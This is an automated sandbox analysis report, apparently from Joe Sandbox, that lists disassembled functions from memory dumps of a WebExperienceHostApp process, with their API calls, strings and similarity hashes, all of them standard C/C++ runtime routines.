Opcode Fuzzy Hash: 7c6913d2299fbb63ca99d8148b6e837cf7c47692d9984bc2afced068521c9eb9
Instruction Fuzzy Hash: CC717C71E08F468CE724AF26D9501BC66A5BBA47A0F8441B9DE4D23BB9DF3CE158C300

Function 00007FFE132036B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

EncodePointer.API-MS-WIN-CORE-UTIL-L1-1-0 ref: 00007FFE132036FC
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1320374B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE132038C3

Strings

RCC, xrefs: 00007FFE13203719
MOC, xrefs: 00007FFE13203710

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 521ae79be483757eb474348e7632ba4031803828054df45ba905b23fe122da5c
Instruction ID: cf1168a49386729fafa00cf2542c5b43fdec5987b8c9ad88060ec4e7fa66d1fa
Opcode Fuzzy Hash: 521ae79be483757eb474348e7632ba4031803828054df45ba905b23fe122da5c
Instruction Fuzzy Hash: EC613C77A08B458AE710DF66E4803AD77A0F794BA8F144265DF4D27BA8CF78E199C700

Function 00007FFDFBA7A764 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A78A
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A79B
isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A7F4
isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA79BB2), ref: 00007FFDFBA7A8A4

Strings

(, xrefs: 00007FFDFBA7A898

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: isspace$isalnumisxdigit
String ID: (
API String ID: 3355161242-3887548279
Opcode ID: e4c8b5f9a1eedea8ab66487062a0c964c7a231e5b0b0ae06890dc159a5d96cfd
Instruction ID: 5c2e91531cd3baf9ba02dae63fe3c3b4a1aeda7f93760ef79bc457b039e77df6
Opcode Fuzzy Hash: e4c8b5f9a1eedea8ab66487062a0c964c7a231e5b0b0ae06890dc159a5d96cfd
Instruction Fuzzy Hash: 69419457F0D18365EB114B30F5707B97BA1DF11B8CF2890B1CAA8071EAEA5DA8069B11

Function 00007FFDFBA7C618 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C63E
iswspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C64F
iswxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFDFBA7BC62), ref: 00007FFDFBA7C6B6

Strings

(, xrefs: 00007FFDFBA7C787

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: iswspace$iswxdigit
String ID: (
API String ID: 3812816871-3887548279
Opcode ID: af74e7a852e4c75f6a718f3a8d1f3b3ec46cce7310ff1cc0720302810e8eb93a
Instruction ID: c679c88d441d6ae89452e92746b81d532b4cf3d8b73951227904e37f19847f43
Opcode Fuzzy Hash: af74e7a852e4c75f6a718f3a8d1f3b3ec46cce7310ff1cc0720302810e8eb93a
Instruction Fuzzy Hash: 3551C227F0D15381EB249F61A5606B977E5EF20F8CF688036DA59068E9FFBDE8418310

Function 00007FFE13205560 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 132COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13205629

Strings

MOC, xrefs: 00007FFE132055A2
RCC, xrefs: 00007FFE132055AE
csm, xrefs: 00007FFE132055C4
csm, xrefs: 00007FFE13205710

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: FileHeader
String ID: MOC$RCC$csm$csm
API String ID: 104395404-1441736206
Opcode ID: e47b9c62b142ec837dc56d6eeb4aaf33c41ea22ad6153d04f5b8a65e6047be76
Instruction ID: 063186d36c3005c232bb7982ad841bccdb65dcd4747a6dfb636500c6dfceefda
Opcode Fuzzy Hash: e47b9c62b142ec837dc56d6eeb4aaf33c41ea22ad6153d04f5b8a65e6047be76
Instruction Fuzzy Hash: D2513072A0DA01CEEB60AB26904137D67A4FFE4BA4F644171DE4D627B5CF3CE489C601

Function 00007FFDFBA644F8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,00000001,00007FFDFBA5AA1C), ref: 00007FFDFBA64539

Part of subcall function 00007FFDFBA4B610: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA71D6E,?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA4B63B
Part of subcall function 00007FFDFBA4B610: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFDFBA71D6E,?,?,?,?,?,?,?,?,00000000,00007FFDFBA72EAE), ref: 00007FFDFBA4B657

_Getvals.LIBCPMT ref: 00007FFDFBA64575

Strings

$+xv, xrefs: 00007FFDFBA645A7
$+xv, xrefs: 00007FFDFBA6461E
+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v, xrefs: 00007FFDFBA645AE

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Getvals___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvmemcpy
String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
API String ID: 3848194746-3573081731
Opcode ID: 2a1dead84669e62d4c6aa20b34b7046138b1e70ef67a0d10036ed14bfbe73e3f
Instruction ID: d7bdb363dce713dde97ff5ccdccf5154c669c407cf9e8c17b864ab8428747aab
Opcode Fuzzy Hash: 2a1dead84669e62d4c6aa20b34b7046138b1e70ef67a0d10036ed14bfbe73e3f
Instruction Fuzzy Hash: 044114B2B09B829BE724CF25D1A086D7BA1FB54781B044235DB9943EA5DFB8F571CB00

Function 00007FFDFBA647CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA647FA

Part of subcall function 00007FFDFBA7BAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB00
Part of subcall function 00007FFDFBA7BAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB08
Part of subcall function 00007FFDFBA7BAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB11
Part of subcall function 00007FFDFBA7BAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFDFBA46043), ref: 00007FFDFBA7BB2D

_Maklocstr.LIBCPMT ref: 00007FFDFBA64873
_Maklocstr.LIBCPMT ref: 00007FFDFBA64889

Strings

true, xrefs: 00007FFDFBA64882
false, xrefs: 00007FFDFBA6486C

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Maklocstr$___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
String ID: false$true
API String ID: 309754672-2658103896
Opcode ID: b86e9ff55447f8bb7dd7b80b7493685c570f732746a915be5b888df3f4acdba4
Instruction ID: b97286212575a29afda59e183e9f91c40de1ce880c6e7556f536e87a00a29cb5
Opcode Fuzzy Hash: b86e9ff55447f8bb7dd7b80b7493685c570f732746a915be5b888df3f4acdba4
Instruction Fuzzy Hash: 96419A23B19B4699E710DF70E4505ED33B0FB48788B405126EE4E27BA9DF38D695C394

Function 00007FFDFBA48CB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 00007FFDFBA48D07
_CxxThrowException.VCRUNTIME140_APP ref: 00007FFDFBA48D18

Strings

ios_base::failbit set, xrefs: 00007FFDFBA48CDB
ios_base::eofbit set, xrefs: 00007FFDFBA48CE2
ios_base::badbit set, xrefs: 00007FFDFBA48CCF

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrowstd::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2003779279-1866435925
Opcode ID: a2b70420098d26693de4527d37465282da3bca17158f06936729b8f78c388bff
Instruction ID: 423d9113da0961c1e368e6e56f2ed08e727af219bc4d3e1efceed329abc085d8
Opcode Fuzzy Hash: a2b70420098d26693de4527d37465282da3bca17158f06936729b8f78c388bff
Instruction Fuzzy Hash: EAF08B61B1A507D6EB54D704E8A1ABA3361EB90348FA44474D22E0A5FDDFBCE246C340

Function 00007FFDFBA55220 Relevance: 7.7, APIs: 5, Instructions: 177COMMON

Download Yara Rule

APIs

fgetwc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA552D4

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: fgetwc
String ID:
API String ID: 2948136663-0
Opcode ID: 5d0bd3b3671dd2de51b020413378f813fd9af0de5620b63b9d479feaafa28656
Instruction ID: 279525157540aad25c3c4eb9398567a8ad0886a540ad7ebd8b32226f92f2838c
Opcode Fuzzy Hash: 5d0bd3b3671dd2de51b020413378f813fd9af0de5620b63b9d479feaafa28656
Instruction Fuzzy Hash: 57814C76B06A42C9EB608F25C0A07AC33A2FB48B98F555132EA5D47BEDDFB9D554C300

Function 00007FFDFBA4B784 Relevance: 7.6, APIs: 5, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B84B
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B859
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B892
memcpy.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B89C
memset.VCRUNTIME140_APP(?,?,?,?,?,?,?,?,?,?,00000000,00007FFDFBA71D6E), ref: 00007FFDFBA4B8AA

Part of subcall function 00007FFDFBA92B1C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFDFBA45AA8), ref: 00007FFDFBA92B36

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpymemset$_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 3375828981-0
Opcode ID: 6f4a34c3589a7d23e4e271cc679256edd1debc67f1c1ab71833d9f73d2c9430a
Instruction ID: d8b6b814363852d41285263e24c22bca7e38ccb6dbd55b3b952256a5442bc796
Opcode Fuzzy Hash: 6f4a34c3589a7d23e4e271cc679256edd1debc67f1c1ab71833d9f73d2c9430a
Instruction Fuzzy Hash: AE31B325B0AA8395EF049B56A5247697351EB08BD4F988531DF6D0BBFECEBCD1419300

Function 00007FFE13209CC4 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE13209D3D
DName::operator+.LIBVCRUNTIME ref: 00007FFE13209D5F
DName::DName.LIBVCRUNTIME ref: 00007FFE13209D72
DName::DName.LIBVCRUNTIME ref: 00007FFE13209DA9
DName::DName.LIBVCRUNTIME ref: 00007FFE13209DB4

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 58c7f08e817265fdc996fa836f6f1a6d952153b3f959fa2b3b32e8b1553b858e
Instruction ID: d21cd0c429eb099c4d7f5f9ca1e6652febe9f11c9f90583a5a4b98db46c4f129
Opcode Fuzzy Hash: 58c7f08e817265fdc996fa836f6f1a6d952153b3f959fa2b3b32e8b1553b858e
Instruction Fuzzy Hash: E8414F32B48E5689E710FB22D9401FC77B4BBA5BA0B9440B5DA5E633B5DF38E519C300

Function 00007FF625A15C80 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00003662E901E308,00007FF625A15077,?,?,00000000,00007FF625A132B7,?,?,?,00007FF625A13297,?,?,00000000,00007FF625A15D42), ref: 00007FF625A15CA2
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00003662E901E308,00007FF625A15077,?,?,00000000,00007FF625A132B7,?,?,?,00007FF625A13297,?,?,00000000,00007FF625A15D42), ref: 00007FF625A15CAE
memset.VCRUNTIME140_APP(?,?,00003662E901E308,00007FF625A15077,?,?,00000000,00007FF625A132B7,?,?,?,00007FF625A13297,?,?,00000000,00007FF625A15D42), ref: 00007FF625A15CE7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00003662E901E308,00007FF625A15077,?,?,00000000,00007FF625A132B7,?,?,?,00007FF625A13297,?,?,00000000,00007FF625A15D42), ref: 00007FF625A15CF6
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00003662E901E308,00007FF625A15077,?,?,00000000,00007FF625A132B7,?,?,?,00007FF625A13297,?,?,00000000,00007FF625A15D42), ref: 00007FF625A15D02

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$memset
String ID:
API String ID: 577239450-0
Opcode ID: 9367a4d55e890f3ae2d68fb533305932e09a24cd37a727d6c0f3e9578350c234
Instruction ID: d40f18521fe30a033a0a2b943d7a25b1f8f2a570e510923518b335a1a9ce2d28
Opcode Fuzzy Hash: 9367a4d55e890f3ae2d68fb533305932e09a24cd37a727d6c0f3e9578350c234
Instruction Fuzzy Hash: 1B017120E0E75282FE305F52AD062796551AF58FD0F18C430DA0AC7799DE2DAC414A53

Function 00007FFDFBA533F0 Relevance: 7.5, APIs: 5, Instructions: 17COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA533FE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA5340A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA53415
fputc.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA53423
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA53429

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: __acrt_iob_func$abortfputcfputs
String ID:
API String ID: 2697642930-0
Opcode ID: aee1c2c9c76fa389c21114d33f76dd71eb7fbf57215ad3c44bcd325c68c615ae
Instruction ID: 5c84ab42c4f92669f03be78370120fd8f73d17c21f3800f9b06b3cc180708f6c
Opcode Fuzzy Hash: aee1c2c9c76fa389c21114d33f76dd71eb7fbf57215ad3c44bcd325c68c615ae
Instruction Fuzzy Hash: 59E0ECA4F1A70383EB085B61EC7EB387226AF48B46F540038C92F473FADEAC94445211

Function 00007FFDFBA77D40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 199COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA77DB4
_Strftime.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFDFBA77DF3
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA77ED9

Part of subcall function 00007FFDFBA50120: memset.VCRUNTIME140_APP ref: 00007FFDFBA50168

Strings

!%x, xrefs: 00007FFDFBA77D72

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Strftime_errno_invalid_parameter_noinfo_noreturnmemset
String ID: !%x
API String ID: 3810971073-1893981228
Opcode ID: ace867cac6d922fdf45cf98f8f1924e58bc32f1dff1343da71478c459ec0add8
Instruction ID: 3ebbb2bb170c1f90013e9848b4f1652c9ba7645b1ec44bf062c62096939d9b07
Opcode Fuzzy Hash: ace867cac6d922fdf45cf98f8f1924e58bc32f1dff1343da71478c459ec0add8
Instruction Fuzzy Hash: 8881AC22B0AB4289FB048B65E8607BC3761EB49B8CF644531DE6D177E9DEB8D585C380

Function 00007FF625A18520 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF625A185F6
OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF625A186E2
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF625A187B8

Strings

_p0, xrefs: 00007FF625A185A9

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: OpenSemaphore$ErrorLast
String ID: _p0
API String ID: 3042991519-2437413317
Opcode ID: e1651974c0d4eb00dff02a0b90013a07eae932ebbb22d0f2ffa93ef9d7cfcb72
Instruction ID: 9b3ad1dc69112fd7a1b311df951b5051704c88aaa5eeb2e3be7b54ff4771ed7c
Opcode Fuzzy Hash: e1651974c0d4eb00dff02a0b90013a07eae932ebbb22d0f2ffa93ef9d7cfcb72
Instruction Fuzzy Hash: 6C718222B19A8281EE61DF64DC521BA63A0FF84BA0F948431EA4DC7B55EF3CDD05C711

Function 00007FFDFBA6CFB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFDFBA6D11C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA6D209

Strings

%.0Lf, xrefs: 00007FFDFBA6D04D
0123456789-, xrefs: 00007FFDFBA6D054

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpy
String ID: %.0Lf$0123456789-
API String ID: 931391446-3094241602
Opcode ID: e9d311e3a2d0453829feae00b2cc32a2770a8b394b8cd978c89192b67e3cf306
